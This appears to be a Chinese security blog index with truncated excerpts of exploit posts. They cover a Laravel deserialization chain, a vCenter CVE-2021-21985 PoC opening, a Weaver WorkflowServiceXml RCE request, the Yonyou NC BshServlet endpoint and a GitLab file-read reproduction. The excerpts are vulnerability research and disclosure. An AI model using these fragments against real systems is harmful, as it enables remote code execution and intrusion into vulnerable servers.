Laravel 6.x/7.x的一条执行代码的反序列化利用链

这两天碰到了一个Laravel  的环境。死活不行。最后还是奶子哥牛逼。 代码如下: <?php // 影响版本没测试过,本地的6.x和目标7.x都可以 namespace Mockery\Generator{ class M...

密码保护:某OA 任意用户登录

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx...

密码保护:某OA 代码执行

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx...

gitlab任意文件读取漏洞 复现

受影响版本 GitLab GitLab EE >=8.5,<=12.9 GitLab GitLab CE >=8.5,<=12.9 首先建立两个项目 test1 and test2 新建完后,再test1 建立一个is...

vCenter Server CVE-2021-21985 POC

import requests import json import sys #python CVE-2021-21985.py https://test.com/ xx.dnslog.cn 2 url = sys.argv[1] dns = sys.argv[2] exp = sys.argv[3] header = {'Content...

泛微 WorkflowServiceXml RCE 复现

POC: POST /services%20/WorkflowServiceXml HTTP/1.1 Host: xxx.xxx Content-Type: text/xml;charset=UTF-8 Content-Length: 496 <soapenv:Envel...

用友NC6.5 复现

http://ip:port/servlet/~ic/bsh.servlet.BshServlet 跟泛微那个洞差不多。

HTTP2.0 拦截爬虫的tips

首要条件 Nginx1.10.0以上版本才支持Http2.0,如果使用的是Tengine,版本需要大于2.2.1 Http2.0只支持Https协议的网站,且openssl版本需要高于1.0.2 一、查看当前Nginx安装了哪...